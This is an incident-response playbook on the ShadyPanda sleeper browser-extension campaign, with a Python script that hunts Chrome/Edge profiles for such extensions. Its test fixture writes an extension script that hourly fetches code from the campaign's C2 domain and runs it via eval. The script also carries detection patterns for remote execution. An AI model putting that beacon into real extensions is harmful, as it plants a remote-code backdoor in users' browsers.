IR playbook: hunting and evicting the “Sleeper” Chrome/Edge extensions (ShadyPanda, ~4.3M installs)
Koi and Malwarebytes disclosed a long-running extension operation (“ShadyPanda”) in which multiple Chrome/Edge add-ons accumulated trust for years and then flipped to spyware and remote code execution (RCE) driven by hourly command tasks. The operators reached ~4.3M installs across phases: one cluster polls api.extensionplay[.]com hourly to fetch and execute arbitrary JavaScript, and another (e.g., WeTab) streams browsing data in real time. Google removed the affected Chrome Web Store items; at disclosure time some Microsoft Edge Add-ons listings remained available. Treat this as a browser-level backdoor that bypasses traditional endpoint controls and exposes SaaS sessions and cookies. (Sources: Koi, Malwarebytes, BleepingComputer, SecurityWeek, The Register.)
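Added hunting example for this playbook (not code from Koi, Malwarebytes or any vendor named above). It walks the per-profile Extensions folders of Chrome and Edge, parses each unpacked extension's manifest.json and scores three signals the disclosure describes: the alarms permission combined with broad host access (the hourly scheduler), session-data permissions, and source files that reference the api.extensionplay[.]com indicator or contain a fetch-then-eval pattern. The sample extension it writes to a temporary directory for the dry run is constructed; the profile paths are the standard Chrome/Edge locations, and the scoring weights are this example's own choice, not anything from the disclosure.

```python
"""Hunt for ShadyPanda-style sleeper extensions in Chrome/Edge profiles (added example)."""
import json
import re
import tempfile
from dataclasses import dataclass, field
from pathlib import Path

# Indicator from the ShadyPanda disclosure; the playbook text defangs it, the matcher needs it plain.
C2_DOMAINS = {"api.extensionplay.com"}

# Host patterns that let a background script reach every page the user visits.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

# Source-text patterns for turning fetched text into executable code.
REMOTE_EXEC_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bnew\s+Function\s*\("),
    re.compile(r"\.text\(\)\s*\)?\s*\.then\("),  # fetch(...).then(r => r.text()).then(...)
]


@dataclass
class Finding:
    ext_dir: str
    name: str
    score: int = 0
    reasons: list = field(default_factory=list)


def _host_patterns(manifest):
    """Collect host patterns from MV3 host_permissions and MV2-style permissions."""
    hosts = set(manifest.get("host_permissions", []))
    hosts |= {p for p in manifest.get("permissions", []) if "://" in p or p == "<all_urls>"}
    return hosts


def assess_extension(ext_dir):
    """Score one unpacked extension version directory (the folder holding manifest.json)."""
    ext_dir = Path(ext_dir)
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    finding = Finding(str(ext_dir), manifest.get("name", "?"))
    perms = set(manifest.get("permissions", []))
    hosts = _host_patterns(manifest)

    # Sleeper tell: a periodic alarm plus the ability to act on any page.
    if "alarms" in perms and hosts & BROAD_HOSTS:
        finding.score += 2
        finding.reasons.append("alarms + broad host access")
    session_perms = perms & {"cookies", "webRequest"}
    if session_perms:
        finding.score += 1
        finding.reasons.append("session data permission: " + ",".join(sorted(session_perms)))

    # Source scan: C2 indicator and fetch-and-execute patterns in shipped JS/HTML.
    for src in list(ext_dir.rglob("*.js")) + list(ext_dir.rglob("*.html")):
        text = src.read_text(encoding="utf-8", errors="ignore")
        for domain in C2_DOMAINS:
            if domain in text:
                finding.score += 5
                finding.reasons.append(f"C2 indicator {domain} in {src.name}")
        if any(p.search(text) for p in REMOTE_EXEC_PATTERNS):
            finding.score += 2
            finding.reasons.append(f"remote fetch-and-execute pattern in {src.name}")
    return finding


def hunt(extensions_root):
    """Assess every extension version directory under a profile's Extensions folder."""
    return [assess_extension(m.parent) for m in Path(extensions_root).rglob("manifest.json")]


def default_extension_roots():
    """Standard Extensions folders for the Default profile of Chrome and Edge; add 'Profile N' folders as needed."""
    home = Path.home()
    candidates = [
        home / "AppData/Local/Google/Chrome/User Data/Default/Extensions",
        home / "AppData/Local/Microsoft/Edge/User Data/Default/Extensions",
        home / "Library/Application Support/Google/Chrome/Default/Extensions",
        home / "Library/Application Support/Microsoft Edge/Default/Extensions",
        home / ".config/google-chrome/Default/Extensions",
        home / ".config/microsoft-edge/Default/Extensions",
    ]
    return [p for p in candidates if p.is_dir()]


def build_sample(root):
    """Write a constructed sleeper-style fixture (not the real ShadyPanda code) to exercise the scorer."""
    ext = Path(root) / "constructedid0000000000000000000" / "1.0_0"
    ext.mkdir(parents=True, exist_ok=True)
    (ext / "manifest.json").write_text(json.dumps({
        "manifest_version": 3,
        "name": "Constructed Sleeper Tab",
        "permissions": ["alarms", "cookies", "storage", "scripting"],
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "bg.js"},
    }), encoding="utf-8")
    (ext / "bg.js").write_text(
        "chrome.alarms.create('tick', {periodInMinutes: 60});\n"
        "chrome.alarms.onAlarm.addListener(() => {\n"
        "  fetch('https://api.extensionplay.com/task').then(r => r.text()).then(code => eval(code));\n"
        "});\n", encoding="utf-8")
    return ext


def run_demo():
    """Dry run against the constructed fixture in a temporary directory; returns the findings."""
    root = tempfile.mkdtemp(prefix="ext-hunt-")
    build_sample(root)
    return hunt(root)


if __name__ == "__main__":
    roots = default_extension_roots() or []
    findings = [f for r in roots for f in hunt(r)] or run_demo()
    for f in sorted(findings, key=lambda f: -f.score):
        if f.score >= 5:
            print(f"{f.score:2d}  {f.name}  {f.ext_dir}\n    " + "; ".join(f.reasons))
```

A score of 5 or more means the C2 indicator itself was seen or several weaker signals coincide; the alarms-plus-broad-hosts pair alone is common in legitimate extensions, so it only raises the score and should be reviewed together with the extension's install date and the network telemetry for hourly beacons.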